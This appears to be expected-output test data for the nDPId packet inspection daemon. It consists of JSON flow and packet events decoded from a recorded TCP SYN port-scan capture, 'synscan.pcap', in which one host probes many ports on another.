+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsfmAAADIGmBKsEAAIQA2GNIzTZIfdU4MZAAAAAGACDADIBAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsDm4AADsG\/wSsEAAIQA2GNIzTGvXdU4MZAAAAAGACEAANlwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAseEgAADoGliqsEAAIQA2GNIzSBdbdUoMYAAAAAGACDAAmuQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAsyqkAADcGRsmsEAAIQA2GNIzSFxfdUoMYAAAAAGACEAAReAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAs+dQAACUGKZ6sEAAIQA2GNIzSgALdUoMYAAAAAGACCACwjAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsBNYAADsGCJ2sEAAIQA2GNIzS92PdUoMYAAAAAGACEAAxKwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAs6IMAADgGJ++sEAAIQA2GNIzSBZrdUoMYAAAAAGACBAAu9QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsTZcAADAGytusEAAIQA2GNIzSE8XdUoMYAAAAAGACBAAgygAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsBk8AADcGCySsEAAIQA2GNIzSB\/3dUoMYAAAAAGACEAAgkgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsHVIAADEG+iCsEAAIQA2GNIzSA4\/dUoMYAAAAAGACCAAtAAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsbqwAACgGscasEAAIQA2GNIzSF6vdUoMYAAAAAGACBAAc5AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsF7gAACwGBLusEAAIQA2GNIzSBK7dUoMYAAAAAGACBAAv4QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsqY8AADIGbOOsEAAIQA2GNIzSIzPdUoMYAAAAAGACDAAJXAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsf8MAADYGkq+sEAAIQA2GNIzSBizdUoMYAAAAAGACDAAmYwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsUswAACYGz6asEAAIQA2GNIzSB\/jdUoMYAAAAAGACDAAklwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAs7CMAACwGME+sEAAIQA2GNIzSF+vdUoMYAAAAAGACBAAcpAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsccoAADkGnaisEAAIQA2GNIzSDvTdUoMYAAAAAGACCAAhmwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsqEQAADMGbS6sEAAIQA2GNIzSII3dUoMYAAAAAGACEAAIAgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsb6oAACoGrsisEAAIQA2GNIzSH1bdUoMYAAAAAGACDAANOQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsZRYAADAGs1ysEAAIQA2GNIzSFbPdUoMYAAAAAGACBAAe3AAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsmgoAADQGemisEAAIQA2GNIzS1xDdUoMYAAAAAGACBABdfgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsSTIAACkG1kCsEAAIQA2GNIzSCHDdUoMYAAAAAGACCAAoHwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsfbAAACoGoMKsEAAIQA2GNIzSIc7dUoMYAAAAAGACDAAKwQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAs7GIAACkGMxCsEAAIQA2GNIzSw1bdUoMYAAAAAGACCABtOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsus4AACoGY6SsEAAIQA2GNIzSCT7dUoMYAAAAAGACDAAjUQAAAgQFtA=="} 